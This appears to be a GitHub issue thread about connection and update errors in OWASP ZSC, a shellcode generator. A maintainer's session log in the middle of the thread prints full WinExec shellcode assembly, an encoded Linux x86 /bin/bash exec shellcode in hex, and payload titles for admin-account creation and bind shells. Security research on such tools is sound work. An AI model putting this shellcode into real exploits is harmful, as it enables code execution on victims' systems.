Open iNoSec opened 6 years ago
My bad, that's simple: the copy/paste is what makes the bug. If I type the command, not like a big fat ass, that works. Can close this issue.
Just update doesn't work.
works fine for me!
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode>
download generate search shell_storm_list
zsc/shellcode> search
keyword_to_search>
download generate search shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148 platform: Windows title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581 platform: Windows title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck shellcode_id: 766 platform: Windows title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck shellcode_id: 662 platform: Windows title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss shellcode_id: 391 platform: Windows title: WinExec() Command Parameter - 104 bytes
zsc> shellcode
zsc/shellcode> download
shellcode_id> 391
;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
assume fs:nothing
code_start:
jmp load_data
setup_parameters:
pop ebp
xor ecx,ecx
push ecx ; ExitThread() exitcode
push ecx ; SW_HIDE
mov cl,(cmd_end-api_hashes) ; limit of 255 bytes per command
inc byte ptr[ebp+ecx]
lea eax,[ebp+(cmd_string-api_hashes)]
push eax ; WinExec command string
get_k32_base:
mov cl,30h
mov eax,fs:[ecx]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h]
get_api_loop:
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h]
lea esi,[ebx+eax+1ch]
mov cl,3
load_rva:
lodsd
add eax,ebx
push eax
loop load_rva
pop ebp
pop edi
load_api:
mov esi,[edi+4*ecx]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api
inc ecx
mov eax,[esp+4]
cmp dx,word ptr[eax]
jne load_api
pop eax
movzx edx,word ptr[ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop esi
call ebx
lodsw
jmp get_k32_base
load_data:
call setup_parameters
api_hashes:
hashapi <WinExec>
hashapi <ExitThread>
code_end:
cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1
end code_start
Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod download exec script_executor write
dir_create download_execute file_create system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash
[+] file_to_execute set to "/bin/bash"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80
Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
If you still have errors, please provide your OS, OS version, and Python version.
Like I said, I copied/pasted the commands, but when I type them, everything works; just the update command fails with a connection error. I can download shellcode from shellstorm, so I have no problem with my connection. I'm not on my PC now, but I will look at the update URL in the code tonight. I'm on ParrotOS and I use Python 2.7 for OWASP ZSC (I'll confirm tonight). Thanks
Hi, whatever I choose, I get an error. I can't see shellstorm shellcode because of a connection error or anything else. I saw there are a ton of bugs after an update; does it affect the whole framework?